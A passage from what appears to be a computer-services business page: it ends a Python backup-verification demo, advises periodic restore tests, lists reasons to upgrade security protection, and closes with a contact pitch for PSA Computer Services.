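    (dst / "photo.jpg").unlink()                                          # never copied
    (dst / "docs/old.txt").write_bytes(b"left over from an earlier run")  # stale extra file
    return src, dst


def run_demo() -> dict[str, list[str]]:
    with tempfile.TemporaryDirectory() as tmp:
        src, dst = build_demo_trees(Path(tmp))
        return verify_backup(src, dst)


if __name__ == "__main__":
    for status, paths in run_demo().items():
        print(f"{status:10s} {paths}")
```

Run it after each backup job, or at least at the quarterly check this list recommends, and treat any entry under missing or mismatched as a failed backup. Hash verification is still not a restore test: once a quarter, actually restore a few files (ideally a whole folder) to a different location and open them, because a backup that verifies but cannot be read back is no backup at all.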

When to Upgrade Your Protection

Consider a more advanced solution if any of the following apply:

  • You run a small business with multiple endpoints and need centralized management.
  • Ransomware or phishing attacks are a frequent threat in your industry.
  • You require application‑aware filtering, IDS/IPS, or secure remote‑access VPNs.
  • You must comply with regulations (HIPAA, PCI‑DSS, GDPR) that mandate specific security controls.

Need Professional Help?

If you’re unsure about the right antivirus, firewall configuration, or overall security posture for your home or business, call PSA Computer Services at (707) 506‑6802. We’ll perform a quick health check, recommend a solution that fits your budget, and set everything up so you can work safely.